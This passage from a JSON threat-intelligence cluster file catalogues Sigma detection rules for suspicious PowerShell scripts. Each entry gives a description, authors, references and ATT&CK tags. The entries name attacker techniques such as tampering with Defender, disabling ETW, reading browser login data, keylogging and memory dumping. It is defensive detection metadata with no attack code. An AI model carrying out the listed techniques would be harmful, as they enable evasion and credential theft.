"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "value": "Disable-WindowsOptionalFeature Command PowerShell" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". 
This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cacef8fc-9d3d-41f7-956d-455c6e881bc5", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock" }, { "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", "meta": { "author": "frack113, Duc.Le-GTSC", "creation_date": "2021-08-03", "falsepositive": [ "Unknown" ], "filename": "posh_ps_detect_vm_env.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://techgenix.com/malicious-powershell-scripts-evade-detection/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ "attack.defense-evasion", "attack.t1497.001" ] }, "related": [ { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "value": "Powershell Detect Virtualization Environment" }, { "description": "Detects obfuscated PowerShell via Stdin in scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "value": "Invoke-Obfuscation Via Stdin - Powershell" }, { "description": "Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365. 
It can be abused by threat actors to attack Azure AD or Office 365.", "meta": { "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_ps_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ "attack.execution", "attack.reconnaissance", "attack.discovery", "attack.credential-access", "attack.impact" ] }, "uuid": "91e69562-2426-42ce-a647-711b8152ced6", "value": "AADInternals PowerShell Cmdlets Execution - PsScript" }, { "description": "Detects the TOKEN OBFUSCATION technique from Invoke-Obfuscation", "meta": { "author": "frack113", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_token_obfuscation.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.009" ] }, "related": [ { "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "value": "Powershell Token Obfuscation - Powershell" }, { "description": "Get the processes that are running on the local computer.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_process.yml", "level": "low", "logsource.category": 
"ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af4c87ce-bdda-4215-b998-15220772e993", "value": "Suspicious Process Discovery With Get-Process" }, { "description": "Detects scripts or commands that disable the PowerShell command history by removing the PSReadLine module", "meta": { "author": "Ali Alwashali", "creation_date": "2022-08-21", "falsepositive": [ "Legitimate script that disables the command history" ], "filename": "posh_ps_disable_psreadline_command_history.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/DissectMalware/status/1062879286749773824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", "value": "Disable Powershell Command History" }, { "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop 
wallpaper\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_wallpaper.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" ], "tags": [ "attack.impact", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "value": "Replace Desktop Wallpaper by Powershell" }, { "description": "Detects Base64 encoded Shellcode", "meta": { "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "creation_date": "2018-11-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_shellcode_b64.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1063072865992523776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "value": "PowerShell ShellCode" }, { "description": "Detects the use of PSAttack PowerShell hack tool", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron 
Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_psattack.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "value": "PowerShell PSAttack" }, { "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "Legitimate administration and backup scripts" ], "filename": "posh_ps_win32_nteventlogfile_usage.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "e2812b49-bae0-4b21-b366-7c142eafcde2", "value": "Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", "meta": { "author": "frack113, MatilJ", "creation_date": "2022-01-19", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_msxml_com.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78aa1347-1517-4454-9982-b338d6df8343", "value": "Powershell MsXml COM Object" }, { "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_etw_trace_evasion.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562.006", "car.2016-04-002" ] }, "related": [ { "dest-uuid": 
"799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "value": "Disable of ETW Trace - Powershell" }, { "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_office_comobject_registerxll.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "value": "Code Executed Via Office Add-in XLL File" }, { "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_local_group_reco.yml", "level": "low", "logsource.category": 
"ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "value": "Suspicious Get Local Groups Information - PowerShell" }, { "description": "Detects storing files in an Alternate Data Stream (ADS), similar to the Astaroth malware.", "meta": { "author": "frack113", "creation_date": "2021-09-02", "falsepositive": [ "Unknown" ], "filename": "posh_ps_store_file_in_alternate_data_stream.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "value": "Powershell Store File In Alternate Data Stream" }, { "description": "Detects PowerShell use of the Start-Process PassThru option to start a process in the background", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_start_process.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", "value": "Suspicious Start-Process PassThru" }, { "description": "Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "meta": { "author": "frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated." 
], "filename": "posh_ps_tamper_windows_defender_set_mp.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "value": "Tamper Windows Defender - ScriptBlockLogging" }, { "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "meta": { "author": "frack113", "creation_date": "2022-01-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_access_to_browser_login_data.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", "value": "Access to Browser Login Data" }, { "description": "Detects PowerShell scripts that contain references to keystroke-capturing functions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_keylogger_activity.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://twitter.com/ScumBots/status/1610626724257046529", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ "attack.collection", "attack.credential-access", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "965e2db9-eddb-4cf6-a986-7a967df651e4", "value": "Potential Keylogger Activity" }, { "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_run_from_mount_diskimage.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", "https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", "value": "Suspicious Invoke-Item From Mount-DiskImage" }, { "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_ad_group_reco.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" }, { "description": "Winlogon.exe is 
a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Unknown" ], "filename": "posh_ps_winlogon_helper_dll.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", "value": "Winlogon Helper DLL" }, { "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "posh_ps_dotnet_assembly_from_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1620" ] }, 
"related": [ { "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "value": "Potential In-Memory Execution Using Reflection.Assembly" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" }, { "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_remove_adgroupmember.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", "value": "Remove Account From Domain Admin Group" }, { "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-09-21", "falsepositive": [ "Diagnostics" ], "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd185561-4760-45d6-a63e-a51325112cae", "value": "Live Memory Dump Using Powershell" }, { "description": "Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity, such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. 
These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Legitimate usage of DSInternals for administration or audit purpose." ], "filename": "posh_ps_dsinternals_cmdlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "846c7a87-8e14-4569-9d49-ecfd4276a01c", "value": "DSInternals Suspicious PowerShell Cmdlets - ScriptBlock" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2019-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
